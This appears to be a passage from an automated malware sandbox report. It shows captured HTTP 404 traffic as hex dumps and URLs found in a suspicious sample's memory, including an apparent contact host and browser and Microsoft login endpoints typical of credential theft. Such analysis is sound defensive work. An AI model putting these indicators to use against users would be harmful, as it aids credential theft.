            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 12:57:30 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 25 Nov 2024 12:57:55 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 25 Nov 2024 12:58:01 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 25 Nov 2024 12:58:04 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 12:59:58 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 13:00:01 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 13:00:04 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 13:00:06 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 13:00:14 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 13:00:16 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 13:00:19 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 13:00:22 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: auecFLppjswMvwfJiAu.exe, 00000006.00000002.3783040260.0000000005804000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.empowermedeco.com
            Source: auecFLppjswMvwfJiAu.exe, 00000006.00000002.3783040260.0000000005804000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.empowermedeco.com/fo8o/
            Source: netbtugc.exe, 00000004.00000003.1654839650.000000000785D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 00000004.00000003.1654839650.000000000785D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netbtugc.exe, 00000004.00000003.1654839650.000000000785D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000004.00000003.1654839650.000000000785D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000004.00000002.3782139985.0000000004492000.00000004.10000000.00040000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000006.00000002.3781244509.0000000004262000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
            Source: netbtugc.exe, 00000004.00000002.3782139985.0000000004492000.00000004.10000000.00040000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000006.00000002.3781244509.0000000004262000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
            Source: netbtugc.exe, 00000004.00000003.1654839650.000000000785D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000004.00000003.1654839650.000000000785D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000004.00000003.1654839650.000000000785D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000004.00000002.3776112621.0000000002B4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000004.00000002.3776112621.0000000002B4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000004.00000003.1651094260.000000000783D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
